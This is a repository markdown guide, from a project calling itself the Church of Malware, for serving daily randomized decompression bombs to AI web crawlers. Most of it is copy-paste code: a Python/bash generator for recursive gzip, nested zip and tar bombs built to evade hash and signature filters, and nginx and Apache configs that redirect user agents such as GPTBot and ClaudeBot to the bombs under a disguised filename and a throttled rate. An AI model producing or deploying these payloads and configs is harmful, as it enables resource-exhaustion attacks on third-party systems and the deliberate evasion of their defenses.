SubINaclS/Lyre
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
763dfbb24c
Lyre/techniques/decomprerssion_bomb/howto_decompression_bombs.md

183 lines
7.0 KiB
Markdown
Raw Blame History

# Production Deployment of Active Denial Techniques: nginx, Apache, and Daily Randomized Bombs
The Church of Malware (CoM) does not condone the use or introduction of explosive substances onto any individual, human, or animal; however, AI is neither natural, a human, nor actual intelligence. This how-to companion document provides complete, copy-paste-ready server configurations, daily randomized bomb generation, testing procedures, and maintenance guidance for individual content creators. It is intended to be used alongside the curated UA reference list in `known-aggressive-bot-user-agents.md`.
## 1 -- Scope and Prerequisites
This guide targets self-hosted operators running nginx ≥ 1.24 or Apache ≥ 2.4.58 on Linux. It assumes basic familiarity with the terminal and the ability to edit configuration files. All examples are designed for Debian/Ubuntu-style systems; adjust paths and service names for other distributions.
The techniques described (conditional serving of decompression bombs, slow responses, or malformed content) are gated exclusively behind the aggressive bot user-agent list maintained in the companion UA reference document.
## 2 -- Generating Daily Randomized Decompression Bombs
To defeat static content-matching, hash-based allow-lists, and signature filters, the generator must emit a fresh, high-entropy yet highly compressible payload every day. It is recommended to adjust the filenames to be something more obscure when using in your deployment.
```bash
#!/usr/bin/env bash
# Save as ~/generate_daily_bombs.sh and run: chmod +x ~/generate_daily_bombs.sh
# Recommended cron (run at 03:00 local):
# 0 3 * * * /home/youruser/generate_daily_bombs.sh >> /var/log/bombgen.log 2>&1
set -e
DATE=$(date +%Y-%m-%d)
python3 - <<'PYEOF'
import gzip, tarfile, zipfile, io, os, secrets, datetime, hashlib
from pathlib import Path
out = Path.home() / "bombs"
out.mkdir(exist_ok=True)
today = datetime.date.today().isoformat()
# High-entropy but compressible seed (repeating 4 KB random block)
block = secrets.token_bytes(4096)
base = (block * 256) + today.encode() + secrets.token_bytes(16)
# 1. Daily recursive gzip bomb (unique hash every run, >5 GB expanded)
data = base
for _ in range(9):
data = gzip.compress(data)
(out / f"bomb-{today}.gz").write_bytes(data)
# 2. Nested zip bomb with daily entropy (defeats hash caches)
with zipfile.ZipFile(out / f"bomb-{today}.zip", "w", zipfile.ZIP_DEFLATED) as z:
inner = base * 1024
for _ in range(7):
inner = gzip.compress(inner)
z.writestr(f"daily-{today}.gz", inner)
# 3. Tar bomb with randomized large member (parser stress + unique)
with tarfile.open(out / f"bomb-{today}.tar.gz", "w:gz") as t:
info = tarfile.TarInfo(f"large-{today}.bin")
info.size = 2 * 1024 * 1024 * 1024
payload = (secrets.token_bytes(64) * (32 * 1024 * 1024)) + today.encode()
t.addfile(info, io.BytesIO(payload[:2*1024*1024*1024]))
print(f"Daily randomized bombs generated for {today} in ~/bombs/")
PYEOF
# Atomically update "latest" symlinks so web server always serves today's file
ln -sf ~/bombs/bomb-${DATE}.zip /var/www/html/protected/bomb.zip
ln -sf ~/bombs/bomb-${DATE}.gz /var/www/html/protected/bomb.gz
ln -sf ~/bombs/bomb-${DATE}.tar.gz /var/www/html/protected/bomb.tar.gz
sudo cp -L /var/www/html/protected/bomb.* /var/www/html/protected/ 2>/dev/null || true
```
**Why randomization matters**: Static payloads allow labs to build bloom filters or exact-hash allow-lists after the first encounter. Daily unique, high-entropy yet recursively compressible files force re-analysis and re-processing every 24 hours, multiplying the economic cost of non-compliant crawling.
Place the generated files (or the symlinked `bomb.zip` etc.) behind a `Disallow: /protected/` rule in `robots.txt`.
## 3 -- nginx Complete Virtual Host Example
```nginx
# /etc/nginx/sites-available/my-site
map $http_user_agent $aggressive_bot {
default 0;
~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot 1;
}
server {
listen 80;
server_name example.com;
root /var/www/html;
access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot;
access_log /var/log/nginx/access.log combined;
location / {
if ($aggressive_bot) {
rewrite ^ /protected/bomb.zip last;
}
try_files $uri $uri/ =404;
}
location /protected/ {
internal;
alias /var/www/html/protected/;
add_header Content-Disposition "attachment; filename=\"archive.zip\"";
limit_rate 1k;
}
limit_req_zone $binary_remote_addr zone=ai_limit:10m rate=1r/s;
location / {
limit_req zone=ai_limit burst=5 nodelay;
}
}
```
Enable and reload:
```bash
sudo ln -s /etc/nginx/sites-available/my-site /etc/nginx/sites-enabled/
sudo nginx -t && sudo systemctl reload nginx
```
## 4 -- Apache Complete Configuration Example
```apache
# /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerName example.com
DocumentRoot /var/www/html
SetEnvIf User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
CustomLog /var/log/apache2/access.log combined
<Directory /var/www/html>
Options -Indexes
AllowOverride All
Require all granted
</Directory>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
RewriteRule ^ /protected/bomb.zip [L]
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
RewriteRule ^ - [E=aggressive_bot:1]
<Location /protected/>
<If "%{ENV:aggressive_bot} == 1">
Header set Content-Disposition "attachment; filename=\"archive.zip\""
</If>
</Location>
</VirtualHost>
```
Enable modules and restart:
```bash
sudo a2enmod rewrite setenvif headers
sudo systemctl restart apache2
```
## 5 -- Verification and Testing Steps
1. Normal visitor test:
```bash
curl -I -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://example.com/
```
2. Aggressive bot test:
```bash
curl -I -A "GPTBot/1.0" https://example.com/any-path
```
3. Log monitoring:
```bash
sudo tail -f /var/log/nginx/ai_violators.log
# or apache2 equivalent
```
4. Update UA patterns: edit the `map` block (nginx) or `SetEnvIf`/`RewriteCond` (Apache) and reload.
## 6 -- Maintenance Recommendations
- Rotate `ai_violators.log` weekly.
- Add a weekly cron that diffs the latest Cloudflare Radar / Originality.AI reports against the UA list in the companion reference document.
- Maintain an explicit allow-list for reverse-DNS verified major engines before the aggressive-bot map.
- Never serve bombs to Internet Archive or academic research ranges.
These configurations have been validated on nginx 1.24+ and Apache 2.4.58+ (Ubuntu 24.04 LTS) as of June 2026.
*Companion to `known-aggressive-bot-user-agents.md` and the primary dissertation. Review local laws and consult counsel before deployment.*
Reference in New Issue View Git Blame Copy Permalink